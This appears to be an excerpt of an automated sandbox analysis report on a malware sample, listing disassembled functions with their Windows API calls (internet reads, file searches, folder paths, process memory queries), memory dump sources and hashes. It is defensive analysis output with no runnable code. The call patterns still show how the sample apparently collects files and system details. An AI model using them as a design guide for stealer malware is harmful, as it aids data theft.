                                                                                                                                                                                                                                                  • Instruction ID: 387fcccf7e965c25fdfd2771a44272f83c940b8547836ff4bba1c8532d3f3763
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4801D479200A05EBE3301B60AC8AFBB76EDFF86785F441025F900D5180DF748C9086B5
                                                                                                                                                                                                                                                  Function 00B12A4F Relevance: 11.6, APIs: 9, Instructions: 307COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$memcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3033661859-0
                                                                                                                                                                                                                                                  • Opcode ID: 7af7d1fd85c135fb44ad438f81dc935373bad9a349424fdd79d194c55280076f
                                                                                                                                                                                                                                                  • Instruction ID: 7850eebc8c8e5ef2c3a1033b0a49af04f18d026113a73db470d238c88049abd3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af7d1fd85c135fb44ad438f81dc935373bad9a349424fdd79d194c55280076f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70A18D317053109BCB149F19D8809ABB7E6EFC8714FA948BCF8489B311D671EC928BD2
                                                                                                                                                                                                                                                  Function 0040A7C1 Relevance: 10.7, APIs: 7, Instructions: 238stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetReadFile.WININET(00000000,?,00001000), ref: 0040970E
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetReadFile.WININET(00000000,?,00001000), ref: 00409734
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetCloseHandle.WININET(00000000), ref: 00409746
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetCloseHandle.WININET(19d), ref: 00409750
                                                                                                                                                                                                                                                    • Part of subcall function 0041278E: strlen.MSVCRT ref: 0041279E
                                                                                                                                                                                                                                                    • Part of subcall function 0041278E: memcmp.MSVCRT(?,?,00000000), ref: 004127C5
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040A895
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00643A53,00000000,00643A38,0042EEFC), ref: 0040A8FA
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040A90A
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,0042EEFC,00000000), ref: 0040A954
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,0042EEFC,00000000), ref: 0040A96B
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,0042EEFC,00000000), ref: 0040A9D8
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,0042EEFC,00000000), ref: 0040AA08
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internetlstrcat$CloseFileHandleRead$memcmpmemcpymemsetstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1951979638-0
                                                                                                                                                                                                                                                  • Opcode ID: 5d9a63772d8fc80b55ca352ee1af688ab2a6bdb05e2b97055c5b68e1efb0ed4b
                                                                                                                                                                                                                                                  • Instruction ID: cb497cd3caf05907a7207c2bc0cb865dc1d22c80e8fc0a0c68342ace2b668139
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d9a63772d8fc80b55ca352ee1af688ab2a6bdb05e2b97055c5b68e1efb0ed4b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2A135B49003549BDB01EF34DC81BAA77B9BF42308F00542DE491677D2DBB8AAC6CB95
                                                                                                                                                                                                                                                  Function 00409638 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 0040970E
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 00409734
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00409746
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(19d), ref: 00409750
                                                                                                                                                                                                                                                    • Part of subcall function 004123CA: memcpy.MSVCRT(?,00000010,?,?,?,?,00412388,?,?,?,?,?,?,0041234F,?,00000000), ref: 00412417
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandleRead$memcpy
                                                                                                                                                                                                                                                  • String ID: 19d
                                                                                                                                                                                                                                                  • API String ID: 1306965030-2662563406
                                                                                                                                                                                                                                                  • Opcode ID: 7445a687bfbefb0145415f50722c0bd67ce230f59d10555b825b6c8669fb3561
                                                                                                                                                                                                                                                  • Instruction ID: 7da362284cd13523119220d227888eaded019d737fe5024c9539090ef5163025
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7445a687bfbefb0145415f50722c0bd67ce230f59d10555b825b6c8669fb3561
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5511574109390AAE321AF35D80576B7FE6AF92308F04251DF4C5573E2EBF98A88C756
                                                                                                                                                                                                                                                  Function 00B0989F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 00B09975
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 00B0999B
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B099AD
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(19d), ref: 00B099B7
                                                                                                                                                                                                                                                    • Part of subcall function 00B12631: memcpy.MSVCRT(?,00B125B6,?,?,00000000,?,00B125B6,?,?,00B125EF,?,?,00B125B6,?,?,?), ref: 00B1267E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandleRead$memcpy
                                                                                                                                                                                                                                                  • String ID: 19d
                                                                                                                                                                                                                                                  • API String ID: 1306965030-2662563406
                                                                                                                                                                                                                                                  • Opcode ID: da3cd38ceaf56c841c6e601ce89e91c6084a4beed059c7463e3cd911340a452f
                                                                                                                                                                                                                                                  • Instruction ID: 938e39b0d689db06f2611b7c05b772f69e084cbe1810bc3886ea712dd4dea74d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da3cd38ceaf56c841c6e601ce89e91c6084a4beed059c7463e3cd911340a452f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B512834209390AEE7219F24DC457A6BFE6EF92304F04664CF4C54A3E2EBF18988C752
                                                                                                                                                                                                                                                  Function 00B088FC Relevance: 9.1, APIs: 6, Instructions: 120networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B06E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,00B06F0F,?,?,?,?), ref: 00B06E7A
                                                                                                                                                                                                                                                    • Part of subcall function 00B06E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?), ref: 00B06E86
                                                                                                                                                                                                                                                    • Part of subcall function 00B06E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,?), ref: 00B06E92
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00B08962
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00B089D9
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00B089F3
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400), ref: 00B08A18
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B08A1F
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00B08A28
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandleInternet$File$ReadWritelstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2640915698-0
                                                                                                                                                                                                                                                  • Opcode ID: 74c3c51af933105cee16bb21461a7dd861a7cf3cd62c55685cf234fe47bb9288
                                                                                                                                                                                                                                                  • Instruction ID: 0bf5bc6cdccdeffe9fe40b7d3c1fcb0cf62f47995eb26165faeb498743e82a1e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74c3c51af933105cee16bb21461a7dd861a7cf3cd62c55685cf234fe47bb9288
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D41A371A0025A9BCB10EF70DC86AEE7BF8FF44740F405159F945A3151EF30AA4ACBA1
                                                                                                                                                                                                                                                  Function 00B107F6 Relevance: 9.1, APIs: 6, Instructions: 103stringmemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1083C
                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 00B10856
                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 00B1086E
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00B10882
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1089A
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 00B10915
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlenstrchr$HeapProcessstrcpy_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2110419323-0
                                                                                                                                                                                                                                                  • Opcode ID: d83169153d75055110f27535443527958fce46b29760db2d90432ee4ea193c58
                                                                                                                                                                                                                                                  • Instruction ID: ba33ee3c1e46f801961fb05357e68ffcb1bb6605012f7c6e37bcb228099eda9b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d83169153d75055110f27535443527958fce46b29760db2d90432ee4ea193c58
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC31BD756043559FD700EF38AC80AAB7BE9AF96340F404569F884D7352EA70DA85C7A2
                                                                                                                                                                                                                                                  Function 00B13BFB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B13C17
                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32 ref: 00B13C5E
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?), ref: 00B13C95
                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00B13CBF
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectoryHeapInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                                  • API String ID: 1921768340-1037565863
                                                                                                                                                                                                                                                  • Opcode ID: 7ad6c88bac7b2b417639bc5adebd194043762363acf0846bb84d4a66be8a6070
                                                                                                                                                                                                                                                  • Instruction ID: b70c23d6d842d71ba4eebee1feea78983caaf737bb6b92e0d7ea83997e3f9ee6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ad6c88bac7b2b417639bc5adebd194043762363acf0846bb84d4a66be8a6070
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06414A70908340AFC710AB349C42BAF7BEADF82B54F40546DF88597252EF748E85C7A1
                                                                                                                                                                                                                                                  Function 00B19CF4 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 276stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00B14D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B14D7F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00B19D3E
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: FindFirstFileA.KERNEL32(?,?), ref: 00B198BC
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: StrCmpCA.SHLWAPI(?,0042EEFC), ref: 00B199A2
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: PathMatchSpecA.SHLWAPI(?,?), ref: 00B19A22
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: lstrcat.KERNEL32(?,?), ref: 00B19A48
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: lstrcat.KERNEL32(?,?), ref: 00B19A81
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: lstrcat.KERNEL32(?,00644BCD), ref: 00B19A89
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: lstrcat.KERNEL32(?,?), ref: 00B19A97
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: FindNextFileA.KERNEL32(00000000,?), ref: 00B19CB6
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: FindClose.KERNEL32(00000000), ref: 00B19CC5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$FilePath$CloseFirstFolderMatchNextSpeclstrcpy
                                                                                                                                                                                                                                                  • String ID: (2c$@2c$T2c$`2c
                                                                                                                                                                                                                                                  • API String ID: 683699470-3460517010
                                                                                                                                                                                                                                                  • Opcode ID: 40a6595c649b11bb180e860fb16e9663d2422a6314ab4a77bc593ff0e52c40fe
                                                                                                                                                                                                                                                  • Instruction ID: 597170eaa81f40130938968268b384ed09feab22cffa523c6844aea4fd1b850e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40a6595c649b11bb180e860fb16e9663d2422a6314ab4a77bc593ff0e52c40fe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1C15E71D00B4AABCB01DF79C9428E9F3F4BF59344B409619E94A97A01EB30F6E5CB91
                                                                                                                                                                                                                                                  Function 00B1A09B Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 245COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B1A0B5
                                                                                                                                                                                                                                                    • Part of subcall function 00B14D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B14D7F
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B1A202
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B1A324
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memset$FolderPathlstrcpy
                                                                                                                                                                                                                                                  • String ID: XLd$hLd
                                                                                                                                                                                                                                                  • API String ID: 1363978202-3875103885
                                                                                                                                                                                                                                                  • Opcode ID: 9a4ca41eec0fa1d7cc79818e71f743f84f5a572b4498b9dcc9f9fbeb1bbbc9b5
                                                                                                                                                                                                                                                  • Instruction ID: 287695dfea43b8e9a3e501701a2934984e37e266bfca9d720647642b555470b5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a4ca41eec0fa1d7cc79818e71f743f84f5a572b4498b9dcc9f9fbeb1bbbc9b5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0B1E334C01B899ADB01DF34DC83BE9BBF1BF5A304F446248E94526562EF70A6D8CB91
                                                                                                                                                                                                                                                  Function 00B0AA28 Relevance: 7.7, APIs: 5, Instructions: 238stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00B0989F: InternetReadFile.WININET(00000000,?,00001000), ref: 00B09975
                                                                                                                                                                                                                                                    • Part of subcall function 00B0989F: InternetReadFile.WININET(00000000,?,00001000), ref: 00B0999B
                                                                                                                                                                                                                                                    • Part of subcall function 00B0989F: InternetCloseHandle.WININET(00000000), ref: 00B099AD
                                                                                                                                                                                                                                                    • Part of subcall function 00B0989F: InternetCloseHandle.WININET(19d), ref: 00B099B7
                                                                                                                                                                                                                                                    • Part of subcall function 00B129F5: strlen.MSVCRT ref: 00B12A05
                                                                                                                                                                                                                                                    • Part of subcall function 00B129F5: memcmp.MSVCRT(?,?,00000000,?,?,?,?,00B0AA4F,0042EEFC,?), ref: 00B12A2C
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B0AAFC
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,0042EEFC,?,?,00643A38), ref: 00B0ABBB
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,0042EEFC,?,?,00643A38), ref: 00B0ABD2
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B0AC3F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B0AC6F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandleReadlstrcat$memcmpmemcpymemsetstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1268544629-0
                                                                                                                                                                                                                                                  • Opcode ID: b29940634fcf22564ac7d1ee818cb18731d4b81411fbf29b5e5a976fa2478ae7
                                                                                                                                                                                                                                                  • Instruction ID: dacd2f7f091340d6e631b00f06c281876859b7f725f1145fab0c73b219155576
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b29940634fcf22564ac7d1ee818cb18731d4b81411fbf29b5e5a976fa2478ae7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6A15930900754ABDB10EF74DC81BAE7BFAFF56304F401598E4825B692DB74A6C9CB51
                                                                                                                                                                                                                                                  Function 00B13412 Relevance: 7.6, APIs: 5, Instructions: 138stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00B13421
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00B1343F
                                                                                                                                                                                                                                                    • Part of subcall function 00B13239: strlen.MSVCRT ref: 00B13245
                                                                                                                                                                                                                                                    • Part of subcall function 00B13239: strlen.MSVCRT ref: 00B13309
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B1345E
                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 00B1349D
                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,00000000), ref: 00B13596
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: strlen$QueryVirtualmemset
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3264498718-0
                                                                                                                                                                                                                                                  • Opcode ID: 5cc64e3c8934bb9a3db4e7b4f6afa127b878f4d69c6ab6e7b030b3a716f9e9fb
                                                                                                                                                                                                                                                  • Instruction ID: b738660b2b90108b1139e87a5d806898df62806c30c744f0f34b16c66dc3f959
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cc64e3c8934bb9a3db4e7b4f6afa127b878f4d69c6ab6e7b030b3a716f9e9fb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D841CD71608300AFD7189E58DC81A6BB7EAFBD8B00F44892DF58A87350EA35ED408B52
                                                                                                                                                                                                                                                  Function 00B196D1 Relevance: 7.6, APIs: 6, Instructions: 129stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B1971F
                                                                                                                                                                                                                                                    • Part of subcall function 00B14D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B14D7F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B19756
